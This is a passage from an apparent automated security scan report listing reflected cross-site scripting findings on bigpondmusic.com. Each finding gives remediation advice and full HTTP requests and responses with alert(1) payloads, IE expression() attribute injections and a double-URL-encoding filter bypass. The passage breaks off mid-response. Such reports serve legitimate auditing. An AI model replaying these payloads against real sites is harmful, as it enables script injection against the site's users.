The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f89c3'%3bd99db4e3abb was submitted in the REST URL parameter 1. This input was echoed as f89c3';d99db4e3abb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /albumf89c3'%3bd99db4e3abb/far-east-movement/like-a-g6 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:22:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87845


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albumf89c3';d99db4e3abb';
   s.prop4 = 'far-east-movement';
   s.prop5 = 'like-a-g6';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.pro
...[SNIP]...

2.48. http://bigpondmusic.com/album/far-east-movement/like-a-g6 [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/far-east-movement/like-a-g6

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 976ec"style%3d"x%3aexpression(alert(1))"4b08bf62004 was submitted in the h parameter. This input was echoed as 976ec"style="x:expression(alert(1))"4b08bf62004 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/far-east-movement/like-a-g6?h=744261064976ec"style%3d"x%3aexpression(alert(1))"4b08bf62004 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:24:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 97682


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Far East Movement - Like a G
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/far-east-movement/like-a-g6?h=744261064976ec"style="x:expression(alert(1))"4b08bf62004" />
...[SNIP]...

2.49. http://bigpondmusic.com/album/far-east-movement/like-a-g6 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/far-east-movement/like-a-g6

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 878a2"style%3d"x%3aexpression(alert(1))"ab522009b4e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 878a2"style="x:expression(alert(1))"ab522009b4e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/far-east-movement/like-a-g6?878a2"style%3d"x%3aexpression(alert(1))"ab522009b4e=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:22:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 97573


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Far East Movement - Like a G
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/far-east-movement/like-a-g6?878a2"style="x:expression(alert(1))"ab522009b4e=1" />
...[SNIP]...

2.50. http://bigpondmusic.com/album/glee-cast/glee-the-music-the-christmas-album [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/glee-cast/glee-the-music-the-christmas-album

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc86a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1869074cf3 was submitted in the REST URL parameter 1. This input was echoed as dc86a"><script>alert(1)</script>1869074cf3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /albumdc86a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1869074cf3/glee-cast/glee-the-music-the-christmas-album HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:18:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88503


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/albumdc86a"><script>alert(1)</script>1869074cf3/glee-cast/glee-the-music-the-christmas-album" />
...[SNIP]...

2.51. http://bigpondmusic.com/album/glee-cast/glee-the-music-the-christmas-album [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/glee-cast/glee-the-music-the-christmas-album

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41244'%3baf912ffdfba was submitted in the REST URL parameter 1. This input was echoed as 41244';af912ffdfba in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album41244'%3baf912ffdfba/glee-cast/glee-the-music-the-christmas-album HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:18:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88067


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album41244';af912ffdfba';
   s.prop4 = 'glee-cast';
   s.prop5 = 'glee-the-music-the-christmas-album';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.p
...[SNIP]...

2.52. http://bigpondmusic.com/album/glee-cast/glee-the-music-the-christmas-album [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/glee-cast/glee-the-music-the-christmas-album

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61097"style%3d"x%3aexpression(alert(1))"481039f11e9 was submitted in the h parameter. This input was echoed as 61097"style="x:expression(alert(1))"481039f11e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/glee-cast/glee-the-music-the-christmas-album?h=76603962461097"style%3d"x%3aexpression(alert(1))"481039f11e9 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:18:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 123124


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Glee Cast - Glee: The Music,
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/glee-cast/glee-the-music-the-christmas-album?h=76603962461097"style="x:expression(alert(1))"481039f11e9" />
...[SNIP]...

2.53. http://bigpondmusic.com/album/glee-cast/glee-the-music-the-christmas-album [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/glee-cast/glee-the-music-the-christmas-album

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b176"style%3d"x%3aexpression(alert(1))"314c9adb4aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9b176"style="x:expression(alert(1))"314c9adb4aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/glee-cast/glee-the-music-the-christmas-album?9b176"style%3d"x%3aexpression(alert(1))"314c9adb4aa=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:18:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 123079


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Glee Cast - Glee: The Music,
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/glee-cast/glee-the-music-the-christmas-album?9b176"style="x:expression(alert(1))"314c9adb4aa=1" />
...[SNIP]...

2.54. http://bigpondmusic.com/album/glee-cast/glee-the-music-the-christmas-album/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/glee-cast/glee-the-music-the-christmas-album/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4974%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0f5d7856cbe was submitted in the REST URL parameter 1. This input was echoed as e4974"><script>alert(1)</script>0f5d7856cbe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /albume4974%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0f5d7856cbe/glee-cast/glee-the-music-the-christmas-album/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:18:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88180


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/albume4974"><script>alert(1)</script>0f5d7856cbe/glee-cast/glee-the-music-the-christmas-album/" />
...[SNIP]...

2.55. http://bigpondmusic.com/album/glee-cast/glee-the-music-the-christmas-album/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/glee-cast/glee-the-music-the-christmas-album/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1bd58'%3bb759352d2a7 was submitted in the REST URL parameter 1. This input was echoed as 1bd58';b759352d2a7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album1bd58'%3bb759352d2a7/glee-cast/glee-the-music-the-christmas-album/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:18:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88285


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album1bd58';b759352d2a7';
   s.prop4 = 'glee-cast';
   s.prop5 = 'glee-the-music-the-christmas-album';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.p
...[SNIP]...

2.56. http://bigpondmusic.com/album/glee-cast/glee-the-music-the-christmas-album/ [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/glee-cast/glee-the-music-the-christmas-album/

Issue detail

The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a07ef"style%3d"x%3aexpression(alert(1))"21c6a478415 was submitted in the cid parameter. This input was echoed as a07ef"style="x:expression(alert(1))"21c6a478415 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/glee-cast/glee-the-music-the-christmas-album/?cid=gleexmasa07ef"style%3d"x%3aexpression(alert(1))"21c6a478415 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:18:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 123535


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Glee Cast - Glee: The Music,
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/glee-cast/glee-the-music-the-christmas-album/?cid=gleexmasa07ef"style="x:expression(alert(1))"21c6a478415" />
...[SNIP]...

2.57. http://bigpondmusic.com/album/glee-cast/glee-the-music-the-christmas-album/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/glee-cast/glee-the-music-the-christmas-album/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb638"style%3d"x%3aexpression(alert(1))"8fd9221ba73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eb638"style="x:expression(alert(1))"8fd9221ba73 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/glee-cast/glee-the-music-the-christmas-album/?eb638"style%3d"x%3aexpression(alert(1))"8fd9221ba73=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:18:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 123075


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Glee Cast - Glee: The Music,
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/glee-cast/glee-the-music-the-christmas-album/?eb638"style="x:expression(alert(1))"8fd9221ba73=1" />
...[SNIP]...

2.58. http://bigpondmusic.com/album/grinderman/worm-tamer [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/grinderman/worm-tamer

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1bf9'%3b287a2412129 was submitted in the REST URL parameter 1. This input was echoed as c1bf9';287a2412129 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /albumc1bf9'%3b287a2412129/grinderman/worm-tamer HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:26:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
